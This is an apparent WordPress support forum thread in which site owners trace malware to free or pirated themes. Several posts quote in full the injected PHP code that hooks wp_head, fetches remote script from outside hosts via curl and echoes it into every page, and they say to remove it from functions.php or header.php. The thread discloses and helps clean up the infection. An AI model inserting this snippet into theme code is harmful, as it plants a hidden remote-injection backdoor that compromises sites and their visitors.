I am having the same problem on my website and Need HELP badly.
Thanks
URL = http://www.wirelessnewsplus.com
It appears you’re using the Broadway Theme from ThemeForest? If so, you should seek support from the Theme developer, as that is a commercial Theme.
@chip Bennett
Thanks, I was able to resolve the problem last night.
Hi everybody, this happend to me too in one of the websites I manage, two days ago and two weeks ago four of the websites I manage were infected with malware. I’ve been investigating since then to see how the malware got into my sites and I am pretty sure that this script is the problem.
Let me explain what happen and forgive my poor english. You may have this php curl code inserted in your website because it might be a template downloaded for free from somewhere and then edited. PHP can be inserted into any template (wp – joomla – drupal – php websites and may be more).
What does the scrip do? Ok, I took this part from hakipedia – “PHP supports libcurl which currently supports the http, https, ftp, gopher, telnet, dict, file, and ldap protocols. libcurl also supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading (this can also be done with PHP’s ftp extension), HTTP form based upload, proxies, cookies, and user+password authentication. cURL can be used in conjunction with PHP scripts for bruteforce attacks (including SQL injection table brute forcing), reconnaissance attacks, spoofing, and data theft.”
As you can see your information might be in bad hands by now… I recommend to seek and delete the script and change all passwords (ftp, data base, wp users, everything.
I’ve seen this scrip in many themes including broadway – thesis – supportpress – viroshop – argentum – faultpress well many many more. (All free downloaded – don’t know about payed copies). This curl php script is in some plugins too.
neo_one, what should i search to delete the script?
I’m also having this issue on NivedRed.Us and I can’t find ANY code including “jqueryc” or “if (!function_exists(‘insert_jquery_theme’)){function insert_jquery_theme(){if (function_exists(‘curl_init’)){$url=”http://www.jqueryc.com/jquery-1.6.3.min.js”;$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action(‘wp_head’, ‘insert_jquery_theme’);}”. Anyone else have this happen?
Thanks Panafricantimes,
i detected the same code in functions.php in the first lines,
if (!function_exists(‘insert_jquery_theme’)){function insert_jquery_theme(){if (function_exists(‘curl_init’)){$url=”http://www.jqueryc.com/jquery-1.6.3.min.js”;$ch = curl_init();$timeout = 15;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action(‘wp_head’, ‘insert_jquery_theme’);}
Removed the lines and problem solved..
Others should look for the above code in Header.php or functions.php
Nivedred if the above solution doesn’t work..
then there is a header.php file. Just above </head> there is the following code, delete it. Make sure you have backed up your site.
<?php
if(function_exists('curl_init'))
{
$url = "http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
?>
Usually that link gets inserted into illegally downloaded plugins or themes
